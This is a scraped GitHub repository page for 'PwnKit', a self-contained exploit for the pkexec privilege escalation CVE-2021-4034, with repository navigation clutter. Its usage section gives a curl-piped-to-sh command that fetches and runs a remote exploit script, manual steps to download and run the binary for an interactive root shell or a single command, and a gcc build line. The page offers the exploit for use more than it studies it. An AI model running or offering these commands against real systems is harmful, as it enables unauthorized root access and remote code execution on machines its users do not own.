PwnKit

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Usage

Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

sh -c "$(curl -fsSL https://raw.githubusercontent.com/cdrclbrs/pwnkit/main/PwnKit.sh)"

Manually

curl -fsSL https://raw.githubusercontent.com/cdrclbrs/pwnkit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

Patched

Running the exploit against patched versions will yield the following output.

Build

gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

Technical Details

https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

References

https://github.com/arthepsy/CVE-2021-4034/

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
imgs		imgs
LICENSE		LICENSE
Makefile		Makefile
PwnKit		PwnKit
PwnKit.c		PwnKit.c
PwnKit.sh		PwnKit.sh
PwnKit32		PwnKit32
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

PwnKit

Usage

Manually

Patched

Build

Technical Details

References

About

Releases

Packages

Languages

License

cdrclbrs/pwnkit

Folders and files

Latest commit

History

Repository files navigation

PwnKit

Usage

Manually

Patched

Build

Technical Details

References

About

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages